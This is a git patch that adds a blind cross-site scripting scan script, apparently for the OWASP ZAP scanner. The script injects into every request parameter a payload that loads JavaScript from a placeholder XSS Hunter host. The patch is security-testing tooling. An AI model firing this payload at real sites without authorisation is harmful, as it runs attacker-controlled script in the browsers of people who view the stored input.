From 9ea2c59dac0891a967eb4000cf9a9c8326d12a4d Mon Sep 17 00:00:00 2001
From: Khaled Nassar <45688522+knassar702@users.noreply.github.com>
Date: Tue, 24 Aug 2021 10:51:26 -0400
Subject: [PATCH] inject blind xss payloads

Add active/bxss.js


Signed-off-by: Khaled Nassar <45688522+knassar702@users.noreply.github.com>
---
 CHANGELOG.md   |  1 +
 active/bxss.py | 18 ++++++++++++++++++
 2 files changed, 19 insertions(+)
 create mode 100644 active/bxss.py

diff --git a/CHANGELOG.md b/CHANGELOG.md
index 05a282e3..bb45c32a 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -8,6 +8,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
 - variant/CompoundCookies.js - An input vector script that handles splitting of compound cookies (Issue 6582).
 - active/corsair.py > An active scan script to check for CORS related issues.)
 - payloadgenerator/securerandom.js > A fuzzer payload generator script that uses Java's SecureRandom as it's source (related to issue 6892).
+- active/bxss.py > an active scan script for inject blind xss payloads to the parameters
 
 ## [13] - 2021-10-14
 ### Fixed
diff --git a/active/bxss.py b/active/bxss.py
new file mode 100644
index 00000000..2de1c4da
--- /dev/null
+++ b/active/bxss.py
@@ -0,0 +1,18 @@
+# by: Khaled Nassar @knassar702
+
+# YOUR XSSHUNTER PAYLOAD
+bxss = '"><script src="//yourusername.xss.ht"></script>'
+def scanNode(sas, msg):
+  pass
+
+
+def scan(sas, msg, param, value):
+
+  # Copy requests before reusing them
+  msg = msg.cloneRequest();
+
+  # setParam (message, parameterName, newValue)
+  sas.setParam(msg, param, bxss);
+
+  # sendAndReceive(msg, followRedirect, handleAntiCSRFtoken)
+  sas.sendAndReceive(msg, False, False);
\ No newline at end of file